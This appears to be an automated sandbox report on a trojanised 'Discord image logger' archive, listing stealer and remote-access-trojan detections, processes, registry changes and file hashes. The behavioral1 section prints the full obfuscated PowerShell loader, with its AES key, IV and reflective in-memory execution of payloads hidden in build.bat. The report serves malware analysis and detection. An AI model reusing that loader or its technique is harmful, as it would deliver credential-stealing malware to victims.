Malware Analysis Report

2025-03-15 03:36

Sample ID 250224-ejvpssyrf1
Target discord-image-logger-release.zip
SHA256 498e1a7d867df07ffa85a9f56e34faf43988b54cc84107e4696a9039fdb8c059
Tags
empyrean seroxen trojan discovery quasar defense_evasion spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

498e1a7d867df07ffa85a9f56e34faf43988b54cc84107e4696a9039fdb8c059

Threat Level: Known bad

The file discord-image-logger-release.zip was found to be: Known bad.

Malicious Activity Summary

empyrean seroxen trojan discovery quasar defense_evasion spyware

Suspicious use of NtCreateUserProcessOtherParentProcess

Empyrean family

Quasar RAT

Detects Empyrean stealer

Quasar family

Quasar payload

Seroxen, Ser0xen

Seroxen family

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Deletes itself

Hide Artifacts: Hidden Window

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Suspicious use of UnmapMainImage

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Runs net.exe

Modifies data under HKEY_USERS

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-02-24 03:58

Signatures

Detects Empyrean stealer

Description Indicator Process Target
N/A N/A N/A N/A

Empyrean family

empyrean

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:00

Platform

win7-20240903-en

Max time kernel

15s

Max time network

17s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat"

Signatures

Seroxen family

seroxen

Seroxen, Ser0xen

trojan seroxen

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe

"build.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function iwkhR($DITIA){ $XVnki=[System.Security.Cryptography.Aes]::Create(); $XVnki.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XVnki.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XVnki.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8ehdS6ppW71xL6mDjAeXsyQHYKmv0CPtd6Kn4aXzt4='); $XVnki.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hx3HwApb8t08fxY/Go7cSw=='); $LrZFK=$XVnki.CreateDecryptor(); $return_var=$LrZFK.TransformFinalBlock($DITIA, 0, $DITIA.Length); $LrZFK.Dispose(); $XVnki.Dispose(); $return_var;}function kOuIB($DITIA){ $DbpkU=New-Object System.IO.MemoryStream(,$DITIA); $qZtjl=New-Object System.IO.MemoryStream; $JMgSB=New-Object System.IO.Compression.GZipStream($DbpkU, [IO.Compression.CompressionMode]::Decompress); $JMgSB.CopyTo($qZtjl); $JMgSB.Dispose(); $DbpkU.Dispose(); $qZtjl.Dispose(); $qZtjl.ToArray();}function ZkZVP($DITIA,$AoxAJ){ $HLgZK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$DITIA); $UXpIZ=$HLgZK.EntryPoint; $UXpIZ.Invoke($null, $AoxAJ);}$zVdRm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat').Split([Environment]::NewLine);foreach ($BYfmw in $zVdRm) { if ($BYfmw.StartsWith(':: ')) { $Rndkm=$BYfmw.Substring(3); break; }}$FMGlq=[string[]]$Rndkm.Split('\');$IgKIL=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[0])));$voFjb=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[1])));ZkZVP $voFjb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZkZVP $IgKIL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe

MD5 852d67a27e454bd389fa7f02a8cbe23f
SHA1 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256 a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

memory/2316-7-0x000007FEF641E000-0x000007FEF641F000-memory.dmp

memory/2316-9-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

memory/2316-8-0x000000001B450000-0x000000001B732000-memory.dmp

memory/2316-10-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

memory/2316-13-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

memory/2316-12-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

memory/2316-11-0x0000000001C30000-0x0000000001C38000-memory.dmp

memory/2316-14-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

memory/2316-15-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 43f5aa3fbc8289e03ff2e024f8af935f
SHA1 3b007b3e299d301e14cb7835d08bb28c0c5e94ea
SHA256 50add287d9f9ff4f172dd3d53e1389c967ba555f579eb4d9c37a7bb617717335
SHA512 3d29a7c7ce1fce233fe241e9fadade84a4f260347fcd8975820b5b36373ba950e4bcabb8c9288ab6bcfe4b0f0aaa25db1e67de77ccbdb5870cb90960cd47b3f5

Analysis: behavioral13

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win7-20240903-en

Max time kernel

118s

Max time network

119s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 ab340cdf345e4ec726ea7997771f0d51
SHA1 73e35b9b8556afa7bae4fa41d3e853d8c4ba3328
SHA256 cad50300c96763f3167d28790e5843a96e974a9aeff9fcbee63a2190190b0f43
SHA512 ccb626d87f7fd68ca5df6b97a2cf2503e4eb5aa27137857d78a8b3be61117252dd508f3a789b59fc4be9af7b317768a50cc4635c6d39708e3fbe11978708d30a

Analysis: behavioral18

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win10v2004-20250217-en

Max time kernel

65s

Max time network

126s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

150s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win10v2004-20250217-en

Max time kernel

93s

Max time network

149s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win7-20241010-en

Max time kernel

120s

Max time network

122s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 6edd3824043efb84d6f6ccc0c467b0b6
SHA1 deee7be6e287a8fe6cb2aaf0a2e1369cd8cc798f
SHA256 47ebf82c2b401edd3a8fb066c142c571cc5fdd14dcef53091a657016b25de699
SHA512 dee2e0df767c1d8a25278bea84e93b17e2f55aebc22a6d46a1aee9dd3a4149c937661915bdb93b27fdf45328de52007f11d13b2ec7c141af07497a8081a3a4d8

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win10v2004-20250217-en

Max time kernel

125s

Max time network

125s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Seroxen family

seroxen

Seroxen, Ser0xen

trojan seroxen

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\ucrtbased.dll C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
File created C:\Windows\System32\vcruntime140_1d.dll C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
File opened for modification C:\Windows\System32\vcruntime140d.dll C:\Windows\$sxr-powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File created C:\Windows\System32\vcruntime140d.dll C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
File opened for modification C:\Windows\System32\ucrtbased.dll C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
File opened for modification C:\Windows\System32\vcruntime140_1d.dll C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
File opened for modification C:\Windows\System32\vcruntime140d.dll C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
File opened for modification C:\Windows\System32\ucrtbased.dll C:\Windows\$sxr-powershell.exe N/A
File opened for modification C:\Windows\System32\vcruntime140_1d.dll C:\Windows\$sxr-powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Windows\system32\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat C:\Windows\system32\cmd.exe N/A
File created C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 24 Feb 2025 04:01:44 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1740369703" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
